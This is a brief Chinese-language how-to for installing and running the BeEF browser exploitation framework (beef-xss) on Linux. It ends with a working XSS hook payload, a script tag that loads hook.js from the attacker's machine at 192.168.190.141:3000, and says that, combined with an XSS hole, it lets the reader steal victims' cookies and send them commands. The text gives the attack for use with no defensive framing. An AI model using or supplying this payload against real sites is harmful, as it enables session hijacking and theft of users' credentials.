1.安装

apt-get update
apt-get install beef-xss

 若报错运行不了尝试

apt remove ruby
apt remove beef-xss
apt-get install ruby
apt-get install ruby-dev libpcap-dev
gem install eventmachine
apt-get install beef-xss

       

2.运行

beef-xss

 运行成功会自动弹出浏览框。

攻击代码:beef-xsx所在电脑的ip:3000/hook.js

<script src="http://192.168.190.141:3000/hook.js"></script>

结合xss漏洞可以获取cookies ，在beef-xss查看结果。

发送指令获取cookies